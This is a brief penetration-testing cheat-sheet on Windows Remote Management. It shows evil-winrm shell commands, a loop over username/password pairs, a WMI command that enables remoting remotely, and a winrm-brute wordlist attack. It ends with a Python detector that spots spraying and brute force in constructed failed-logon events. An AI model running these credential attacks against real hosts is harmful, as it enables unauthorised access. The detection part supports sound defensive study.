Windows Remote Management (WinRM / wsman) is a service that listens on port 5985 (HTTP) and port 5986 (HTTPS).
Evil Winrm
Evil-WinRM (available on GitHub) opens an interactive shell for a given user:
root@kali:~# evil-winrm -i $victim -u melanie -p 'Welcome123!'
For many users (user_pass.txt holds one username,password pair per line):
while IFS=, read -r username password; do
  echo "$username / $password"
  evil-winrm -i "$victim" -u "$username" -p "$password"
done < user_pass.txt
Commands:
- upload <local> <remote>
- download <remote> <local>
- services
- menu
Activate from a shell
From a shell with administrative rights on the remote host, WinRM can be activated through WMI:
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
Brute force
winrm-brute (a Ruby tool run through bundler) can brute-force WinRM logins for a username against a wordlist:
bundle exec ./winrm-brute.rb -u nathen -P /root/p141.general.1/0270-worker/enum/cewl-words-from-cartoon-site.txt $victim
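As an added example (not code from the original page or from either tool), the defender's view of the credential loop and the winrm-brute run above: it walks constructed failed-logon records shaped like Windows Security event 4625 with LogonType 3 (network logon, which is what a WinRM authentication failure produces on the target) and flags a source that fails against many accounts (spraying) or hammers one account (brute force) inside a short window. The field names, sample events and thresholds are assumptions.

```python
"""Flag WinRM credential spraying / brute forcing from failed-logon events."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample events shaped like Security event 4625 (failed logon).
# They are made up for this example, not real logs. A WinRM auth failure is
# logged on the target as 4625 with LogonType 3, so that is the filter below.
SAMPLE_EVENTS = [
    # spraying: one source tries a password against many accounts
    *[{"event_id": 4625, "logon_type": 3, "ip": "10.0.0.5", "user": u,
       "time": f"2024-05-01T10:00:{i:02d}"}
      for i, u in enumerate(["melanie", "nathen", "alice", "bob", "carol", "dave"])],
    # brute force: one source works through a wordlist against one account
    *[{"event_id": 4625, "logon_type": 3, "ip": "10.0.0.9", "user": "nathen",
       "time": f"2024-05-01T11:00:{i:02d}"} for i in range(12)],
    # benign: a single typo from a user's own workstation
    {"event_id": 4625, "logon_type": 3, "ip": "10.0.0.7", "user": "eve",
     "time": "2024-05-01T12:00:00"},
    # interactive (console) failure, not WinRM: must be ignored
    {"event_id": 4625, "logon_type": 2, "ip": "10.0.0.9", "user": "nathen",
     "time": "2024-05-01T11:00:30"},
]


def detect(events, window=timedelta(minutes=5), spray_users=5, brute_attempts=10):
    """Return a sorted list of (kind, source_ip) findings.

    kind is "spray" when one source fails against >= spray_users distinct
    accounts within `window`, and "brute" when it fails >= brute_attempts
    times against a single account within `window`.
    """
    by_ip = defaultdict(list)
    for ev in events:
        if ev["event_id"] == 4625 and ev["logon_type"] == 3:
            by_ip[ev["ip"]].append((datetime.fromisoformat(ev["time"]), ev["user"]))
    findings = set()
    for ip, attempts in by_ip.items():
        attempts.sort()
        start = 0
        for end, (t_end, _) in enumerate(attempts):
            # advance the window start until all attempts fit inside `window`
            while t_end - attempts[start][0] > window:
                start += 1
            per_user = Counter(u for _, u in attempts[start:end + 1])
            if len(per_user) >= spray_users:
                findings.add(("spray", ip))
            if max(per_user.values()) >= brute_attempts:
                findings.add(("brute", ip))
    return sorted(findings)


if __name__ == "__main__":
    for kind, ip in detect(SAMPLE_EVENTS):
        print(f"{kind}: {ip}")
```

Feeding it real 4625 records means mapping IpAddress, TargetUserName, LogonType and TimeCreated onto the same keys; the WinRM operational log can be used to corroborate the hits.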